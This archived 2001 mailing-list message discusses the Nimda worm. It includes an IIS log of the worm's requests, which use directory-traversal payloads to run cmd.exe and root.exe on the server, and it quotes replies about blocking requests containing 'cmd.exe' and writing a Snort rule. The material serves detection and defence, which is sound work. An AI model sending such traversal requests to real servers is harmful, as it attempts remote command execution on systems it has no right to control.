Date: Tue, 18 Sep 2001 14:54:36 -0700 From: "John Howie" <JHowie@msn.com> To: "Derek O'Flynn" <derekoflynn@hotmail.com>, <freebsd-security@FreeBSD.ORG>, "Brett Glass" <brett@lariat.org> Subject: Re: NIMDA Virus Message-ID: <010a01c1408c$82bf0380$0101a8c0@development.local> References: <4.3.2.7.2.20010918153412.0493bc10@localhost>
next in thread | previous in thread | raw e-mail | index | archive | help
Probably not enough - the Hydra (two-heads) is also doing NetBIOS queries. The example log below shows the entrire attack from an IIS standpoint. I have no example of the NetBIOS attack pattern because we haven't been infected. john... 2001-09-18 13:21:25 216.210.XXX.XXX- 192.168.1.251 80 GET /scripts/root.exe /c+dir 404 - 2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /MSADC/root.exe /c+dir 404 - 2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /c/winnt/system32/cmd.exe /c+dir 404 - 2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /d/winnt/system32/cmd.exe /c+dir 404 - 2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 - 2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..Á ../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 - 2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 - 2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 - 2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 - ----- Original Message ----- From: "Brett Glass" <brett@lariat.org> To: "Derek O'Flynn" <derekoflynn@hotmail.com>; <freebsd-security@FreeBSD.ORG> Sent: Tuesday, September 18, 2001 2:39 PM Subject: Re: NIMDA Virus > We just put a log monitor on the Apache server, and are firewalling anything > that sends a request with "cmd.exe" in it. Quite effective. > > --Brett > > > At 03:31 PM 9/18/2001, Derek O'Flynn wrote: > > >Has anyone successfully written a rule for snort to alert to this? > > > >I'm currently running snort 1.8 with flex-resp. > > > >I would like to have a rule that identifies the attacks and then sends the tcp_rst command so that the worm can't infect new machines. I have the information for the rule, just need to know what to put in the content field to verify that it is nimda. > > > >Thanks, > >Derek O'Flynn > > > > > >_________________________________________________________________ > >Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?010a01c1408c$82bf0380$0101a8c0>